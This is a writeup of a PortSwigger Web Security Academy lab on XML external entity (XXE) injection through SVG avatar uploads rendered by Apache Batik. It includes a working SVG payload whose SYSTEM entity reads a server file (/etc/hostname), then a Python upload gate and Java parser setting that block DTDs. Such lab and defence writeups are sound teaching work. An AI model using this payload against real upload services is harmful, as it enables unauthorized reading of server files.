| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | XXE — SVG File Upload |
| Difficulty | Practitioner |
| Objective | Upload a malicious SVG that reads /etc/hostname and submit the value |
# Exploiting XXE via Image File Upload — Writeup

## Initial Observation
The comment section on any post allows uploading an avatar image:
The lab mentions that Apache Batik is used to process avatar files. Batik is an SVG rendering library for Java, and SVG is XML. If Batik renders the SVG server-side, the file goes through an XML parser, and any external entity declared in its DOCTYPE will be resolved unless that parser has been configured to disallow DTDs or external entities.
## Attack Path

### Crafting the Malicious SVG

SVG is an XML-based format, which means we can embed a DOCTYPE with an external entity declaration directly in the file. The entity value loads `/etc/hostname`, and we reference it inside a `<text>` element so the resolved content gets rendered into the image:
```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
```
Saving this as a .svg file and uploading it as the avatar:
The avatar renders with some characters visible. Opening the image in a new tab shows the hostname rendered as text inside the SVG:
Submitting the hostname value solves the lab o.o
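On the defensive side, the fix is to keep DTDs away from the renderer entirely rather than trusting its parser settings. The gate below is an added example written for this writeup, not code from the lab or from Batik; it assumes the avatar handler can run it over the raw upload bytes before anything parses the SVG, and it uses Python's expat declaration callbacks rather than a regex on `<!DOCTYPE`, so the check sees exactly what a parser would see.

```python
import xml.parsers.expat as expat

# Constructed sample uploads (not captured from the lab).
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
<circle cx="64" cy="64" r="40"/>
</svg>"""

# Same shape as the writeup's payload, included only to show the gate rejects it.
DOCTYPE_SVG = b"""<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<svg xmlns="http://www.w3.org/2000/svg"><text x="0" y="16">&xxe;</text></svg>"""


class UnsafeSvg(Exception):
    """Raised from inside a parser callback to stop parsing immediately."""


def screen_svg_upload(data):
    """Return (accepted, reason) for raw upload bytes.

    The declaration callbacks abort the parse at the first DOCTYPE or entity
    declaration, so a SYSTEM entity is never opened here, and the file is
    dropped before it reaches the renderer, whatever that renderer's parser
    settings happen to be.
    """
    parser = expat.ParserCreate()
    seen_root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeSvg(f"DOCTYPE {name!r} not permitted in avatar uploads")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeSvg(f"entity {name!r} declared with SYSTEM id {sysid!r}")

    def on_start(tag, attrs):
        if not seen_root:
            seen_root.append(tag)  # record the document element only

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except UnsafeSvg as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    if seen_root != ["svg"]:
        return False, f"root element {seen_root[0]!r} is not <svg>"
    return True, "no DTD or entity declarations; root element is <svg>"
```

Editors such as Inkscape emit a DOCTYPE carrying the SVG 1.1 public identifier, so a production gate may need to accept a DOCTYPE with no internal subset while still rejecting every entity declaration. The equivalent on the Java side is to set the Xerces feature `http://apache.org/xml/features/disallow-doctype-decl` on the parser factory that feeds the renderer.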